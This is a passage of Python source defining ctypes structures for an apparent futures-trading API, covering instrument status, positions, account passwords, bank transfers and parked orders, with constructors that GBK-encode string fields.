                setattr(self, field, text.encode("GBK"))
class InstrumentStatus(Struct):
    """Instrument trading-status notification.

    ``str`` arguments are stored as GBK-encoded bytes; numeric arguments
    are stored whenever they are not ``None``, so ``TradingSegmentSN=0``
    is no longer dropped by the generated truthiness check.
    """
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("ExchangeInstID", c_char_Array_31),
        ("SettlementGroupID", c_char_Array_9),
        ("InstrumentID", c_char_Array_31),
        ("InstrumentStatus", c_char),
        ("TradingSegmentSN", c_int),
        ("EnterTime", c_char_Array_9),
        ("EnterReason", c_char),
    ]
    def __init__(self, ExchangeID=None, ExchangeInstID=None, SettlementGroupID=None, InstrumentID=None, InstrumentStatus=None, TradingSegmentSN=None, EnterTime=None, EnterReason=None):
        super().__init__()
        args = locals()
        # Each __init__ parameter mirrors a _fields_ entry one-to-one.
        for name, _ctype in self._fields_:
            value = args[name]
            if value is None:
                continue  # keep the zeroed ctypes default
            # str -> GBK bytes (wire encoding); numbers pass through as-is
            setattr(self, name, value.encode("GBK") if isinstance(value, str) else value)
class QryInstrumentStatus(Struct):
    """Query filter for instrument status; strings stored GBK-encoded."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("ExchangeInstID", c_char_Array_31),
    ]
    def __init__(self, ExchangeID=None, ExchangeInstID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("ExchangeID", ExchangeID),
            ("ExchangeInstID", ExchangeInstID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class InvestorAccount(Struct):
    """Link between an investor and a funding account; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, AccountID=None, CurrencyID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class PositionProfitAlgorithm(Struct):
    """Position-profit calculation algorithm for an account; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("Algorithm", c_char),
        ("Memo", c_char_Array_161),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, BrokerID=None, AccountID=None, Algorithm=None, Memo=None, CurrencyID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("AccountID", AccountID),
            ("Algorithm", Algorithm),
            ("Memo", Memo),
            ("CurrencyID", CurrencyID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class Discount(Struct):
    """Broker discount rate for an investor (range); strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorRange", c_char),
        ("InvestorID", c_char_Array_13),
        ("Discount", c_double),
    ]
    def __init__(self, BrokerID=None, InvestorRange=None, InvestorID=None, Discount=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so an explicit 0.0 discount is honored.
        """
        super().__init__()
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorRange", InvestorRange),
            ("InvestorID", InvestorID),
            ("Discount", Discount),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryTransferBank(Struct):
    """Query filter for transfer banks; strings stored GBK-encoded."""
    _fields_ = [
        ("BankID", c_char_Array_4),
        ("BankBrchID", c_char_Array_5),
    ]
    def __init__(self, BankID=None, BankBrchID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BankID", BankID),
            ("BankBrchID", BankBrchID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class TransferBank(Struct):
    """A bank available for fund transfer; strings stored GBK-encoded."""
    _fields_ = [
        ("BankID", c_char_Array_4),
        ("BankBrchID", c_char_Array_5),
        ("BankName", c_char_Array_101),
        ("IsActive", c_int),
    ]
    def __init__(self, BankID=None, BankBrchID=None, BankName=None, IsActive=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so an explicit IsActive=0 is honored.
        """
        super().__init__()
        for _name, _value in (
            ("BankID", BankID),
            ("BankBrchID", BankBrchID),
            ("BankName", BankName),
            ("IsActive", IsActive),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryInvestorPositionDetail(Struct):
    """Query filter for investor position details; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InvestUnitID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class InvestorPositionDetail(Struct):
    """Per-trade position detail of an investor; strings stored GBK-encoded."""
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("HedgeFlag", c_char),
        ("Direction", c_char),
        ("OpenDate", c_char_Array_9),
        ("TradeID", c_char_Array_21),
        ("Volume", c_int),
        ("OpenPrice", c_double),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("TradeType", c_char),
        ("CombInstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("CloseProfitByDate", c_double),
        ("CloseProfitByTrade", c_double),
        ("PositionProfitByDate", c_double),
        ("PositionProfitByTrade", c_double),
        ("Margin", c_double),
        ("ExchMargin", c_double),
        ("MarginRateByMoney", c_double),
        ("MarginRateByVolume", c_double),
        ("LastSettlementPrice", c_double),
        ("SettlementPrice", c_double),
        ("CloseVolume", c_int),
        ("CloseAmount", c_double),
        ("TimeFirstVolume", c_int),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, InstrumentID=None, BrokerID=None, InvestorID=None, HedgeFlag=None, Direction=None, OpenDate=None, TradeID=None, Volume=None, OpenPrice=None, TradingDay=None, SettlementID=None, TradeType=None, CombInstrumentID=None, ExchangeID=None, CloseProfitByDate=None, CloseProfitByTrade=None, PositionProfitByDate=None, PositionProfitByTrade=None, Margin=None, ExchMargin=None, MarginRateByMoney=None, MarginRateByVolume=None, LastSettlementPrice=None, SettlementPrice=None, CloseVolume=None, CloseAmount=None, TimeFirstVolume=None, InvestUnitID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so falsy values like 0 / 0.0 / "" are
        honored; str values are GBK-encoded, bytes are accepted as-is.
        """
        super().__init__()
        for _name, _value in (
            ("InstrumentID", InstrumentID),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("HedgeFlag", HedgeFlag),
            ("Direction", Direction),
            ("OpenDate", OpenDate),
            ("TradeID", TradeID),
            ("Volume", Volume),
            ("OpenPrice", OpenPrice),
            ("TradingDay", TradingDay),
            ("SettlementID", SettlementID),
            ("TradeType", TradeType),
            ("CombInstrumentID", CombInstrumentID),
            ("ExchangeID", ExchangeID),
            ("CloseProfitByDate", CloseProfitByDate),
            ("CloseProfitByTrade", CloseProfitByTrade),
            ("PositionProfitByDate", PositionProfitByDate),
            ("PositionProfitByTrade", PositionProfitByTrade),
            ("Margin", Margin),
            ("ExchMargin", ExchMargin),
            ("MarginRateByMoney", MarginRateByMoney),
            ("MarginRateByVolume", MarginRateByVolume),
            ("LastSettlementPrice", LastSettlementPrice),
            ("SettlementPrice", SettlementPrice),
            ("CloseVolume", CloseVolume),
            ("CloseAmount", CloseAmount),
            ("TimeFirstVolume", TimeFirstVolume),
            ("InvestUnitID", InvestUnitID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class TradingAccountPassword(Struct):
    """Trading account password record; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, BrokerID=None, AccountID=None, Password=None, CurrencyID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("AccountID", AccountID),
            ("Password", Password),
            ("CurrencyID", CurrencyID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class MDTraderOffer(Struct):
    """Market-data trader connection/offer state; strings stored GBK-encoded."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("ParticipantID", c_char_Array_11),
        ("Password", c_char_Array_41),
        ("InstallID", c_int),
        ("OrderLocalID", c_char_Array_13),
        ("TraderConnectStatus", c_char),
        ("ConnectRequestDate", c_char_Array_9),
        ("ConnectRequestTime", c_char_Array_9),
        ("LastReportDate", c_char_Array_9),
        ("LastReportTime", c_char_Array_9),
        ("ConnectDate", c_char_Array_9),
        ("ConnectTime", c_char_Array_9),
        ("StartDate", c_char_Array_9),
        ("StartTime", c_char_Array_9),
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("MaxTradeID", c_char_Array_21),
        ("MaxOrderMessageReference", c_char_Array_7),
    ]
    def __init__(self, ExchangeID=None, TraderID=None, ParticipantID=None, Password=None, InstallID=None, OrderLocalID=None, TraderConnectStatus=None, ConnectRequestDate=None, ConnectRequestTime=None, LastReportDate=None, LastReportTime=None, ConnectDate=None, ConnectTime=None, StartDate=None, StartTime=None, TradingDay=None, BrokerID=None, MaxTradeID=None, MaxOrderMessageReference=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so falsy values like 0 / "" are honored;
        str values are GBK-encoded, bytes are accepted as-is.
        """
        super().__init__()
        for _name, _value in (
            ("ExchangeID", ExchangeID),
            ("TraderID", TraderID),
            ("ParticipantID", ParticipantID),
            ("Password", Password),
            ("InstallID", InstallID),
            ("OrderLocalID", OrderLocalID),
            ("TraderConnectStatus", TraderConnectStatus),
            ("ConnectRequestDate", ConnectRequestDate),
            ("ConnectRequestTime", ConnectRequestTime),
            ("LastReportDate", LastReportDate),
            ("LastReportTime", LastReportTime),
            ("ConnectDate", ConnectDate),
            ("ConnectTime", ConnectTime),
            ("StartDate", StartDate),
            ("StartTime", StartTime),
            ("TradingDay", TradingDay),
            ("BrokerID", BrokerID),
            ("MaxTradeID", MaxTradeID),
            ("MaxOrderMessageReference", MaxOrderMessageReference),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryMDTraderOffer(Struct):
    """Query filter for MD trader offers; strings stored GBK-encoded."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("TraderID", c_char_Array_21),
    ]
    def __init__(self, ExchangeID=None, ParticipantID=None, TraderID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("ExchangeID", ExchangeID),
            ("ParticipantID", ParticipantID),
            ("TraderID", TraderID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryNotice(Struct):
    """Query filter for broker notices."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
    ]
    def __init__(self, BrokerID=None):
        """Set BrokerID if passed (GBK-encoded); None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        if BrokerID is not None:
            self.BrokerID = BrokerID.encode("GBK") if isinstance(BrokerID, str) else BrokerID
class Notice(Struct):
    """A broker notice message; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("Content", c_char_Array_501),
        ("SequenceLabel", c_char_Array_2),
    ]
    def __init__(self, BrokerID=None, Content=None, SequenceLabel=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("Content", Content),
            ("SequenceLabel", SequenceLabel),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class UserRight(Struct):
    """A permission flag for a broker user; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("UserRightType", c_char),
        ("IsForbidden", c_int),
    ]
    def __init__(self, BrokerID=None, UserID=None, UserRightType=None, IsForbidden=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so an explicit IsForbidden=0 is honored.
        """
        super().__init__()
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("UserRightType", UserRightType),
            ("IsForbidden", IsForbidden),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QrySettlementInfoConfirm(Struct):
    """Query filter for settlement-info confirmations; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, AccountID=None, CurrencyID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class LoadSettlementInfo(Struct):
    """Request to load settlement information for a broker."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
    ]
    def __init__(self, BrokerID=None):
        """Set BrokerID if passed (GBK-encoded); None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        if BrokerID is not None:
            self.BrokerID = BrokerID.encode("GBK") if isinstance(BrokerID, str) else BrokerID
class BrokerWithdrawAlgorithm(Struct):
    """Broker-level withdrawal algorithm configuration; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("WithdrawAlgorithm", c_char),
        ("UsingRatio", c_double),
        ("IncludeCloseProfit", c_char),
        ("AllWithoutTrade", c_char),
        ("AvailIncludeCloseProfit", c_char),
        ("IsBrokerUserEvent", c_int),
        ("CurrencyID", c_char_Array_4),
        ("FundMortgageRatio", c_double),
        ("BalanceAlgorithm", c_char),
    ]
    def __init__(self, BrokerID=None, WithdrawAlgorithm=None, UsingRatio=None, IncludeCloseProfit=None, AllWithoutTrade=None, AvailIncludeCloseProfit=None, IsBrokerUserEvent=None, CurrencyID=None, FundMortgageRatio=None, BalanceAlgorithm=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so falsy values like 0 / 0.0 / "" are
        honored; str values are GBK-encoded, bytes are accepted as-is.
        """
        super().__init__()
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("WithdrawAlgorithm", WithdrawAlgorithm),
            ("UsingRatio", UsingRatio),
            ("IncludeCloseProfit", IncludeCloseProfit),
            ("AllWithoutTrade", AllWithoutTrade),
            ("AvailIncludeCloseProfit", AvailIncludeCloseProfit),
            ("IsBrokerUserEvent", IsBrokerUserEvent),
            ("CurrencyID", CurrencyID),
            ("FundMortgageRatio", FundMortgageRatio),
            ("BalanceAlgorithm", BalanceAlgorithm),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class TradingAccountPasswordUpdateV1(Struct):
    """Legacy (V1) trading-account password change request; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OldPassword", c_char_Array_41),
        ("NewPassword", c_char_Array_41),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, OldPassword=None, NewPassword=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("OldPassword", OldPassword),
            ("NewPassword", NewPassword),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class TradingAccountPasswordUpdate(Struct):
    """Trading-account password change request; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("OldPassword", c_char_Array_41),
        ("NewPassword", c_char_Array_41),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, BrokerID=None, AccountID=None, OldPassword=None, NewPassword=None, CurrencyID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("AccountID", AccountID),
            ("OldPassword", OldPassword),
            ("NewPassword", NewPassword),
            ("CurrencyID", CurrencyID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryCombinationLeg(Struct):
    """Query filter for combination-contract legs; strings stored GBK-encoded."""
    _fields_ = [
        ("CombInstrumentID", c_char_Array_31),
        ("LegID", c_int),
        ("LegInstrumentID", c_char_Array_31),
    ]
    def __init__(self, CombInstrumentID=None, LegID=None, LegInstrumentID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so an explicit LegID=0 is honored.
        """
        super().__init__()
        for _name, _value in (
            ("CombInstrumentID", CombInstrumentID),
            ("LegID", LegID),
            ("LegInstrumentID", LegInstrumentID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QrySyncStatus(Struct):
    """Query filter for data-sync status by trading day."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
    ]
    def __init__(self, TradingDay=None):
        """Set TradingDay if passed (GBK-encoded); None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        if TradingDay is not None:
            self.TradingDay = TradingDay.encode("GBK") if isinstance(TradingDay, str) else TradingDay
class CombinationLeg(Struct):
    """A leg of a combination contract; strings stored GBK-encoded."""
    _fields_ = [
        ("CombInstrumentID", c_char_Array_31),
        ("LegID", c_int),
        ("LegInstrumentID", c_char_Array_31),
        ("Direction", c_char),
        ("LegMultiple", c_int),
        ("ImplyLevel", c_int),
    ]
    def __init__(self, CombInstrumentID=None, LegID=None, LegInstrumentID=None, Direction=None, LegMultiple=None, ImplyLevel=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so explicit zero values are honored.
        """
        super().__init__()
        for _name, _value in (
            ("CombInstrumentID", CombInstrumentID),
            ("LegID", LegID),
            ("LegInstrumentID", LegInstrumentID),
            ("Direction", Direction),
            ("LegMultiple", LegMultiple),
            ("ImplyLevel", ImplyLevel),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class SyncStatus(Struct):
    """Data synchronization status for a trading day; strings stored GBK-encoded."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("DataSyncStatus", c_char),
    ]
    def __init__(self, TradingDay=None, DataSyncStatus=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("TradingDay", TradingDay),
            ("DataSyncStatus", DataSyncStatus),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryLinkMan(Struct):
    """Query filter for investor contact persons; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class LinkMan(Struct):
    """Contact person attached to an investor; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("PersonType", c_char),
        ("IdentifiedCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("PersonName", c_char_Array_81),
        ("Telephone", c_char_Array_41),
        ("Address", c_char_Array_101),
        ("ZipCode", c_char_Array_7),
        ("Priority", c_int),
        ("UOAZipCode", c_char_Array_11),
        ("PersonFullName", c_char_Array_101),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, PersonType=None, IdentifiedCardType=None, IdentifiedCardNo=None, PersonName=None, Telephone=None, Address=None, ZipCode=None, Priority=None, UOAZipCode=None, PersonFullName=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so an explicit Priority=0 / "" is
        honored; str values are GBK-encoded, bytes are accepted as-is.
        """
        super().__init__()
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("PersonType", PersonType),
            ("IdentifiedCardType", IdentifiedCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("PersonName", PersonName),
            ("Telephone", Telephone),
            ("Address", Address),
            ("ZipCode", ZipCode),
            ("Priority", Priority),
            ("UOAZipCode", UOAZipCode),
            ("PersonFullName", PersonFullName),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryBrokerUserEvent(Struct):
    """Query filter for broker user events; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("UserEventType", c_char),
    ]
    def __init__(self, BrokerID=None, UserID=None, UserEventType=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("UserEventType", UserEventType),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class BrokerUserEvent(Struct):
    """An audit event raised by a broker user; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("UserEventType", c_char),
        ("EventSequenceNo", c_int),
        ("EventDate", c_char_Array_9),
        ("EventTime", c_char_Array_9),
        ("UserEventInfo", c_char_Array_1025),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
    ]
    def __init__(self, BrokerID=None, UserID=None, UserEventType=None, EventSequenceNo=None, EventDate=None, EventTime=None, UserEventInfo=None, InvestorID=None, InstrumentID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so explicit 0 / "" values are honored.
        """
        super().__init__()
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("UserEventType", UserEventType),
            ("EventSequenceNo", EventSequenceNo),
            ("EventDate", EventDate),
            ("EventTime", EventTime),
            ("UserEventInfo", UserEventInfo),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class QryContractBank(Struct):
    """Query filter for contracted banks; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("BankID", c_char_Array_4),
        ("BankBrchID", c_char_Array_5),
    ]
    def __init__(self, BrokerID=None, BankID=None, BankBrchID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("BankID", BankID),
            ("BankBrchID", BankBrchID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class ContractBank(Struct):
    """A bank contracted with the broker; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("BankID", c_char_Array_4),
        ("BankBrchID", c_char_Array_5),
        ("BankName", c_char_Array_101),
    ]
    def __init__(self, BrokerID=None, BankID=None, BankBrchID=None, BankName=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default."""
        super().__init__()
        # `is not None` so an explicit empty string is still assigned.
        for _name, _value in (
            ("BrokerID", BrokerID),
            ("BankID", BankID),
            ("BankBrchID", BankBrchID),
            ("BankName", BankName),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class InvestorPositionCombineDetail(Struct):
    """Per-trade detail of a combined (spread) position; strings stored GBK-encoded."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("OpenDate", c_char_Array_9),
        ("ExchangeID", c_char_Array_9),
        ("SettlementID", c_int),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("ComTradeID", c_char_Array_21),
        ("TradeID", c_char_Array_21),
        ("InstrumentID", c_char_Array_31),
        ("HedgeFlag", c_char),
        ("Direction", c_char),
        ("TotalAmt", c_int),
        ("Margin", c_double),
        ("ExchMargin", c_double),
        ("MarginRateByMoney", c_double),
        ("MarginRateByVolume", c_double),
        ("LegID", c_int),
        ("LegMultiple", c_int),
        ("CombInstrumentID", c_char_Array_31),
        ("TradeGroupID", c_int),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, TradingDay=None, OpenDate=None, ExchangeID=None, SettlementID=None, BrokerID=None, InvestorID=None, ComTradeID=None, TradeID=None, InstrumentID=None, HedgeFlag=None, Direction=None, TotalAmt=None, Margin=None, ExchMargin=None, MarginRateByMoney=None, MarginRateByVolume=None, LegID=None, LegMultiple=None, CombInstrumentID=None, TradeGroupID=None, InvestUnitID=None):
        """Set only explicitly-passed fields; None keeps the ctypes zero default.

        `is not None` (not truthiness) so falsy values like 0 / 0.0 / "" are
        honored; str values are GBK-encoded, bytes are accepted as-is.
        """
        super().__init__()
        for _name, _value in (
            ("TradingDay", TradingDay),
            ("OpenDate", OpenDate),
            ("ExchangeID", ExchangeID),
            ("SettlementID", SettlementID),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ComTradeID", ComTradeID),
            ("TradeID", TradeID),
            ("InstrumentID", InstrumentID),
            ("HedgeFlag", HedgeFlag),
            ("Direction", Direction),
            ("TotalAmt", TotalAmt),
            ("Margin", Margin),
            ("ExchMargin", ExchMargin),
            ("MarginRateByMoney", MarginRateByMoney),
            ("MarginRateByVolume", MarginRateByVolume),
            ("LegID", LegID),
            ("LegMultiple", LegMultiple),
            ("CombInstrumentID", CombInstrumentID),
            ("TradeGroupID", TradeGroupID),
            ("InvestUnitID", InvestUnitID),
        ):
            if _value is not None:
                setattr(self, _name, _value.encode("GBK") if isinstance(_value, str) else _value)
class ParkedOrder(Struct):
    """An order parked at the broker for conditional submission; strings stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("OrderRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("OrderPriceType", c_char),
        ("Direction", c_char),
        ("CombOffsetFlag", c_char_Array_5),
        ("CombHedgeFlag", c_char_Array_5),
        ("LimitPrice", c_double),
        ("VolumeTotalOriginal", c_int),
        ("TimeCondition", c_char),
        ("GTDDate", c_char_Array_9),
        ("VolumeCondition", c_char),
        ("MinVolume", c_int),
        ("ContingentCondition", c_char),
        ("StopPrice", c_double),
        ("ForceCloseReason", c_char),
        ("IsAutoSuspend", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("RequestID", c_int),
        ("UserForceClose", c_int),
        ("ExchangeID", c_char_Array_9),
        ("ParkedOrderID", c_char_Array_13),
        ("UserType", c_char),
        ("Status", c_char),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("IsSwapOrder", c_int),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("ClientID", c_char_Array_11),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
